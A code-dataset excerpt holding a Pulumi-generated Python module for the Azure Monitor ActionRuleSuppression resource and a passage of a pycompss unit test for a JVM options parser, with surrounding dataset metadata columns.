| 0.642857
| 0.323529
| 0.441176
| 0.558824
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089888
| 178
| 3
| 91
| 59.333333
| 0.839506
| 0
| 0
| 0
| 0
| 0
| 0.337079
| 0.123596
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
face4ee107d4dbf60d3aecbf0045a2409c6e059a
| 24,995
|
py
|
Python
|
sdk/python/pulumi_azure/monitoring/action_rule_suppression.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/monitoring/action_rule_suppression.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/monitoring/action_rule_suppression.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ActionRuleSuppressionArgs', 'ActionRuleSuppression']
@pulumi.input_type
class ActionRuleSuppressionArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
suppression: pulumi.Input['ActionRuleSuppressionSuppressionArgs'],
condition: Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ActionRuleSuppression resource.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleSuppressionSuppressionArgs'] suppression: A `suppression` block as defined below.
:param pulumi.Input['ActionRuleSuppressionConditionArgs'] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleSuppressionScopeArgs'] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "suppression", suppression)
if condition is not None:
pulumi.set(__self__, "condition", condition)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def suppression(self) -> pulumi.Input['ActionRuleSuppressionSuppressionArgs']:
"""
A `suppression` block as defined below.
"""
return pulumi.get(self, "suppression")
@suppression.setter
def suppression(self, value: pulumi.Input['ActionRuleSuppressionSuppressionArgs']):
pulumi.set(self, "suppression", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ActionRuleSuppressionState:
def __init__(__self__, *,
condition: Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']] = None,
suppression: Optional[pulumi.Input['ActionRuleSuppressionSuppressionArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ActionRuleSuppression resources.
:param pulumi.Input['ActionRuleSuppressionConditionArgs'] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleSuppressionScopeArgs'] scope: A `scope` block as defined below.
:param pulumi.Input['ActionRuleSuppressionSuppressionArgs'] suppression: A `suppression` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if condition is not None:
pulumi.set(__self__, "condition", condition)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if suppression is not None:
pulumi.set(__self__, "suppression", suppression)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def suppression(self) -> Optional[pulumi.Input['ActionRuleSuppressionSuppressionArgs']]:
"""
A `suppression` block as defined below.
"""
return pulumi.get(self, "suppression")
@suppression.setter
def suppression(self, value: Optional[pulumi.Input['ActionRuleSuppressionSuppressionArgs']]):
pulumi.set(self, "suppression", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ActionRuleSuppression(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']]] = None,
suppression: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an Monitor Action Rule which type is suppression.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_action_rule_suppression = azure.monitoring.ActionRuleSuppression("exampleActionRuleSuppression",
resource_group_name=example_resource_group.name,
scope=azure.monitoring.ActionRuleSuppressionScopeArgs(
type="ResourceGroup",
resource_ids=[example_resource_group.id],
),
suppression=azure.monitoring.ActionRuleSuppressionSuppressionArgs(
recurrence_type="Weekly",
schedule=azure.monitoring.ActionRuleSuppressionSuppressionScheduleArgs(
start_date_utc="2019-01-01T01:02:03Z",
end_date_utc="2019-01-03T15:02:07Z",
recurrence_weeklies=[
"Sunday",
"Monday",
"Friday",
"Saturday",
],
),
),
tags={
"foo": "bar",
})
```
## Import
Monitor Action Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/actionRuleSuppression:ActionRuleSuppression example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AlertsManagement/actionRules/actionRule1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']] scope: A `scope` block as defined below.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']] suppression: A `suppression` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ActionRuleSuppressionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Monitor Action Rule which type is suppression.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_action_rule_suppression = azure.monitoring.ActionRuleSuppression("exampleActionRuleSuppression",
resource_group_name=example_resource_group.name,
scope=azure.monitoring.ActionRuleSuppressionScopeArgs(
type="ResourceGroup",
resource_ids=[example_resource_group.id],
),
suppression=azure.monitoring.ActionRuleSuppressionSuppressionArgs(
recurrence_type="Weekly",
schedule=azure.monitoring.ActionRuleSuppressionSuppressionScheduleArgs(
start_date_utc="2019-01-01T01:02:03Z",
end_date_utc="2019-01-03T15:02:07Z",
recurrence_weeklies=[
"Sunday",
"Monday",
"Friday",
"Saturday",
],
),
),
tags={
"foo": "bar",
})
```
## Import
Monitor Action Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/actionRuleSuppression:ActionRuleSuppression example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AlertsManagement/actionRules/actionRule1
```
:param str resource_name: The name of the resource.
:param ActionRuleSuppressionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ActionRuleSuppressionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']]] = None,
suppression: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ActionRuleSuppressionArgs.__new__(ActionRuleSuppressionArgs)
__props__.__dict__["condition"] = condition
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["scope"] = scope
if suppression is None and not opts.urn:
raise TypeError("Missing required property 'suppression'")
__props__.__dict__["suppression"] = suppression
__props__.__dict__["tags"] = tags
super(ActionRuleSuppression, __self__).__init__(
'azure:monitoring/actionRuleSuppression:ActionRuleSuppression',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']]] = None,
suppression: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'ActionRuleSuppression':
"""
Get an existing ActionRuleSuppression resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']] scope: A `scope` block as defined below.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']] suppression: A `suppression` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ActionRuleSuppressionState.__new__(_ActionRuleSuppressionState)
__props__.__dict__["condition"] = condition
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["scope"] = scope
__props__.__dict__["suppression"] = suppression
__props__.__dict__["tags"] = tags
return ActionRuleSuppression(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def condition(self) -> pulumi.Output[Optional['outputs.ActionRuleSuppressionCondition']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def scope(self) -> pulumi.Output[Optional['outputs.ActionRuleSuppressionScope']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@property
@pulumi.getter
def suppression(self) -> pulumi.Output['outputs.ActionRuleSuppressionSuppression']:
"""
A `suppression` block as defined below.
"""
return pulumi.get(self, "suppression")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 44.713775
| 228
| 0.64793
| 2,621
| 24,995
| 6.011064
| 0.080122
| 0.084481
| 0.079594
| 0.033513
| 0.868169
| 0.852555
| 0.833323
| 0.820755
| 0.811425
| 0.805712
| 0
| 0.006675
| 0.25077
| 24,995
| 558
| 229
| 44.793907
| 0.834624
| 0.354791
| 0
| 0.771331
| 1
| 0
| 0.141301
| 0.079452
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16041
| false
| 0.003413
| 0.023891
| 0
| 0.279863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4f042972143dddd108c391e36698977053ed0bbf
| 8,945
|
py
|
Python
|
compss/programming_model/bindings/python/src/pycompss/tests/util/test_jvm_parser.py
|
eflows4hpc/compss
|
c497f6d34722103c6c8f83ebc314b495573ce054
|
[
"Apache-2.0"
] | null | null | null |
compss/programming_model/bindings/python/src/pycompss/tests/util/test_jvm_parser.py
|
eflows4hpc/compss
|
c497f6d34722103c6c8f83ebc314b495573ce054
|
[
"Apache-2.0"
] | null | null | null |
compss/programming_model/bindings/python/src/pycompss/tests/util/test_jvm_parser.py
|
eflows4hpc/compss
|
c497f6d34722103c6c8f83ebc314b495573ce054
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
import os
import tempfile
import shutil
from pycompss.util.exceptions import PyCOMPSsException
def test_jvm_parser():
from pycompss.util.jvm.parser import convert_to_dict
jvm_opt_file = tempfile.NamedTemporaryFile(delete=False).name
temp_folder = tempfile.mkdtemp()
jvm_expected_result = {
"+PerfDisableSharedMem": True,
"-UsePerfData": True,
"+UseG1GC": True,
"+UseThreadPriorities": True,
"ThreadPriorityPolicy=42": True,
"-Dlog4j.configurationFile": "/opt/COMPSs/Runtime/configuration/log/COMPSsMaster-log4j.debug", # noqa: E501
"-Dcompss.to.file": "false",
"-Dcompss.project.file": "/opt/COMPSs/Runtime/configuration/xml/projects/default_project.xml", # noqa: E501
"-Dcompss.resources.file": "/opt/COMPSs/Runtime/configuration/xml/resources/default_resources.xml", # noqa: E501
"-Dcompss.project.schema": "/opt/COMPSs/Runtime/configuration/xml/projects/project_schema.xsd", # noqa: E501
"-Dcompss.resources.schema": "/opt/COMPSs/Runtime/configuration/xml/resources/resources_schema.xsd", # noqa: E501
"-Dcompss.lang": "python",
"-Dcompss.summary": "false",
"-Dcompss.task.execution": "compss",
"-Dcompss.storage.conf": "null",
"-Dcompss.streaming": "null",
"-Dcompss.streaming.masterName": "null",
"-Dcompss.streaming.masterPort": "null",
"-Dcompss.core.count": "50",
"-Dcompss.appName": "increment",
"-Dcompss.uuid": "dc126fe7-1b0a-4360-80f2-55c815e2e604",
"-Dcompss.baseLogDir": "",
"-Dcompss.specificLogDir": "",
"-Dcompss.appLogDir": temp_folder,
"-Dcompss.graph": "false",
"-Dcompss.monitor": "0",
"-Dcompss.tracing": "0",
"-Dcompss.extrae.file": "null",
"-Dcompss.comm": "es.bsc.compss.nio.master.NIOAdaptor",
"-Dcompss.conn": "es.bsc.compss.connectors.DefaultSSHConnector",
"-Dcompss.masterName": "",
"-Dcompss.masterPort": "",
"-Dcompss.scheduler": "es.bsc.compss.scheduler.lookahead.locality.LocalityTS", # noqa: E501
"-Dgat.adaptor.path": "/opt/COMPSs/Dependencies/JAVA_GAT/lib/adaptors",
"-Dgat.debug": "true",
"-Dgat.broker.adaptor": "sshtrilead",
"-Dgat.file.adaptor": "sshtrilead",
"-Dcompss.worker.cp": "/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/opt/COMPSs/Runtime/compss-engine.jar::/opt/COMPSs/Runtime/compss-engine.jar", # noqa: E501
"-Dcompss.worker.jvm_opts": "-Xms1024m,-Xmx1024m,-Xmn400m",
"-Dcompss.worker.cpu_affinity": "automatic",
"-Dcompss.worker.gpu_affinity": "automatic",
"-Dcompss.worker.fpga_affinity": "automatic",
"-Dcompss.worker.fpga_reprogram": "",
"-Dcompss.profile.input": "",
"-Dcompss.profile.output": "",
"-Dcompss.scheduler.config": "",
"-Dcompss.external.adaptation": "false",
"-Djava.class.path": "/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/opt/COMPSs/Runtime/compss-engine.jar::/opt/COMPSs/Runtime/compss-engine.jar", # noqa: E501
"-Djava.library.path": "/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Runtime/compss-engine.jar:/usr/lib64/jvm/java-1.8.0/jre/lib/amd64/server/:/usr/lib64/mpi/gcc/openmpi/lib64/:/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Runtime/compss-engine.jar:/usr/lib64/jvm/java-1.8.0/jre/lib/amd64/server/:/usr/lib64/mpi/gcc/openmpi/lib64/:/usr/lib64/mpi/gcc/openmpi/lib64::/opt/COMPSs/Bindings/bindings-common/lib:/usr/lib64/jvm/java/jre/lib/amd64/server", # noqa: E501
"-Dcompss.worker.pythonpath": "/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/home/user/gitlab/framework/compss/programming_model/bindings/python:.:/opt/COMPSs/Bindings/python/:/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Bindings/python/:/opt/COMPSs/Bindings/bindings-common/lib/:", # noqa: E501
"-Dcompss.python.interpreter": "python2",
"-Dcompss.python.version": "2",
"-Dcompss.python.virtualenvironment": "null",
"-Dcompss.python.propagate_virtualenvironment": "true",
"-Dcompss.python.mpi_worker": "false",
"other": True,
}
with open(jvm_opt_file, "w") as f_jvm:
f_jvm.write(
"""-XX:+PerfDisableSharedMem
-XX:-UsePerfData
-XX:+UseG1GC
-XX:+UseThreadPriorities
-XX:ThreadPriorityPolicy=42
-Dlog4j.configurationFile=/opt/COMPSs/Runtime/configuration/log/COMPSsMaster-log4j.debug
-Dcompss.to.file=false
-Dcompss.project.file=/opt/COMPSs/Runtime/configuration/xml/projects/default_project.xml
-Dcompss.resources.file=/opt/COMPSs/Runtime/configuration/xml/resources/default_resources.xml
-Dcompss.project.schema=/opt/COMPSs/Runtime/configuration/xml/projects/project_schema.xsd
-Dcompss.resources.schema=/opt/COMPSs/Runtime/configuration/xml/resources/resources_schema.xsd
-Dcompss.lang=python
-Dcompss.summary=false
-Dcompss.task.execution=compss
-Dcompss.storage.conf=null
-Dcompss.streaming=null
-Dcompss.streaming.masterName=null
-Dcompss.streaming.masterPort=null
-Dcompss.core.count=50
-Dcompss.appName=increment
-Dcompss.uuid=dc126fe7-1b0a-4360-80f2-55c815e2e604
-Dcompss.baseLogDir=
-Dcompss.specificLogDir=
-Dcompss.appLogDir={0}
-Dcompss.graph=false
-Dcompss.monitor=0
-Dcompss.tracing=0
-Dcompss.extrae.file=null
-Dcompss.comm=es.bsc.compss.nio.master.NIOAdaptor
-Dcompss.conn=es.bsc.compss.connectors.DefaultSSHConnector
-Dcompss.masterName=
-Dcompss.masterPort=
-Dcompss.scheduler=es.bsc.compss.scheduler.lookahead.locality.LocalityTS
-Dgat.adaptor.path=/opt/COMPSs/Dependencies/JAVA_GAT/lib/adaptors
-Dgat.debug=true
-Dgat.broker.adaptor=sshtrilead
-Dgat.file.adaptor=sshtrilead
-Dcompss.worker.cp=/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/opt/COMPSs/Runtime/compss-engine.jar::/opt/COMPSs/Runtime/compss-engine.jar
-Dcompss.worker.jvm_opts=-Xms1024m,-Xmx1024m,-Xmn400m
-Dcompss.worker.cpu_affinity=automatic
-Dcompss.worker.gpu_affinity=automatic
-Dcompss.worker.fpga_affinity=automatic
-Dcompss.worker.fpga_reprogram=
-Dcompss.profile.input=
-Dcompss.profile.output=
-Dcompss.scheduler.config=
-Dcompss.external.adaptation=false
-Djava.class.path=/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/opt/COMPSs/Runtime/compss-engine.jar::/opt/COMPSs/Runtime/compss-engine.jar
-Djava.library.path=/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Runtime/compss-engine.jar:/usr/lib64/jvm/java-1.8.0/jre/lib/amd64/server/:/usr/lib64/mpi/gcc/openmpi/lib64/:/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Runtime/compss-engine.jar:/usr/lib64/jvm/java-1.8.0/jre/lib/amd64/server/:/usr/lib64/mpi/gcc/openmpi/lib64/:/usr/lib64/mpi/gcc/openmpi/lib64::/opt/COMPSs/Bindings/bindings-common/lib:/usr/lib64/jvm/java/jre/lib/amd64/server
-Dcompss.worker.pythonpath=/home/user/gitlab/framework/compss/programming_model/bindings/python/src/pycompss/tests/runtime/../resources:/home/user/gitlab/framework/compss/programming_model/bindings/python:.:/opt/COMPSs/Bindings/python/:/opt/COMPSs/Bindings/bindings-common/lib/:/opt/COMPSs/Bindings/python/:/opt/COMPSs/Bindings/bindings-common/lib/:
-Dcompss.python.interpreter=python2
-Dcompss.python.version=2
-Dcompss.python.virtualenvironment=null
-Dcompss.python.propagate_virtualenvironment=true
-Dcompss.python.mpi_worker=false
other
""".format(
temp_folder
) # noqa
)
result = convert_to_dict(jvm_opt_file)
assert len(result) == len(
jvm_expected_result
), "The sizes of the dictionaries does not match"
for k, v in jvm_expected_result.items():
if k not in result:
